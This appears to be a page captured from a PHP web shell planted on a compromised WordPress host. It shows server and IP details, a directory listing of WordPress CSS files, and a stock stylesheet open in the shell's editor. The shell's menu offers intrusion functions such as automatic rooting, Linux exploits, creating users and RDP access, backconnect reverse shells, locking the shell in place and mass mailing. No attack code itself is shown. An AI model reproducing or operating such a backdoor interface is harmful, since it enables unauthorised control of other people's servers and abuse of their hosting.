Linux webm010.cluster103.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.103.20.10 | : 216.73.217.75
Cant Read [ /etc/named.conf ]
7.4.33
cuisinesj
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
cuisinesj /
www /
2015 /
wp-includes /
css /
[ HOME SHELL ]
Name
Size
Permission
Action
admin-bar-rtl.css
23.65
KB
-rw----r--
admin-bar-rtl.min.css
18.89
KB
-rw----r--
admin-bar.css
23.64
KB
-rw----r--
admin-bar.min.css
18.88
KB
-rw----r--
buttons-rtl.css
8.94
KB
-rw----r--
buttons-rtl.min.css
5.74
KB
-rw----r--
buttons.css
8.94
KB
-rw----r--
buttons.min.css
5.74
KB
-rw----r--
dashicons.css
44.92
KB
-rw----r--
dashicons.min.css
42.62
KB
-rw----r--
editor-rtl.css
37.23
KB
-rw----r--
editor-rtl.min.css
28.98
KB
-rw----r--
editor.css
37.23
KB
-rw----r--
editor.min.css
28.98
KB
-rw----r--
jquery-ui-dialog-rtl.css
6.04
KB
-rw----r--
jquery-ui-dialog-rtl.min.css
4.64
KB
-rw----r--
jquery-ui-dialog.css
6.04
KB
-rw----r--
jquery-ui-dialog.min.css
4.64
KB
-rw----r--
media-views-rtl.css
46.8
KB
-rw----r--
media-views-rtl.min.css
39.43
KB
-rw----r--
media-views.css
46.8
KB
-rw----r--
media-views.min.css
39.43
KB
-rw----r--
wp-auth-check-rtl.css
2.26
KB
-rw----r--
wp-auth-check-rtl.min.css
1.68
KB
-rw----r--
wp-auth-check.css
2.26
KB
-rw----r--
wp-auth-check.min.css
1.68
KB
-rw----r--
wp-pointer-rtl.css
3.79
KB
-rw----r--
wp-pointer-rtl.min.css
2.99
KB
-rw----r--
wp-pointer.css
3.79
KB
-rw----r--
wp-pointer.min.css
2.99
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-auth-check.css
/*------------------------------------------------------------------------------ Interim login dialog ------------------------------------------------------------------------------*/ #wp-auth-check-wrap.hidden { display: none; } #wp-auth-check-wrap #wp-auth-check-bg { position: fixed; top: 0; bottom: 0; left: 0; right: 0; background: #000; opacity: 0.7; filter: alpha(opacity=70); z-index: 1000010; /* needs to appear above .notification-dialog */ } #wp-auth-check-wrap #wp-auth-check { position: fixed; left: 50%; overflow: hidden; top: 40px; bottom: 20px; max-height: 415px; width: 380px; margin: 0 0 0 -190px; padding: 30px 0 0; background-color: #f1f1f1; z-index: 1000011; /* needs to appear above #wp-auth-check-bg */ -webkit-box-shadow: 0 3px 6px rgba( 0, 0, 0, 0.3 ); box-shadow: 0 3px 6px rgba( 0, 0, 0, 0.3 ); } @media screen and ( max-width: 380px ) { #wp-auth-check-wrap #wp-auth-check { left: 0; width: 100%; margin: 0; } } #wp-auth-check-wrap.fallback #wp-auth-check { max-height: 180px; overflow: auto; } #wp-auth-check-wrap #wp-auth-check-form { background: url(../images/spinner-2x.gif) no-repeat center center; -webkit-background-size: 16px 16px; background-size: 16px 16px; height: 100%; overflow: auto; -webkit-overflow-scrolling: touch; } #wp-auth-check-wrap #wp-auth-check-form iframe { height: 98%; /* Scrollbar fix */ width: 100%; } #wp-auth-check-wrap .wp-auth-check-close { position: absolute; top: 8px; right: 8px; height: 22px; width: 22px; cursor: pointer; } #wp-auth-check-wrap .wp-auth-check-close:before { content: '\f158'; display: block !important; font: normal 20px/1 'dashicons'; speak: none; height: 22px; margin: 2px 0; text-align: center; width: 22px; color: #777; -webkit-font-smoothing: antialiased !important; -moz-osx-font-smoothing: grayscale; } #wp-auth-check-wrap .wp-auth-check-close:hover:before { color: #0073aa; } #wp-auth-check-wrap .wp-auth-check-close:focus { outline: 1px dotted #82878c; } #wp-auth-check-wrap .wp-auth-fallback-expired { outline: 0; } #wp-auth-check-wrap .wp-auth-fallback { font-size: 14px; line-height: 21px; padding: 0 25px; display: none; } #wp-auth-check-wrap.fallback .wp-auth-fallback, #wp-auth-check-wrap.fallback .wp-auth-check-close { display: block; }
Close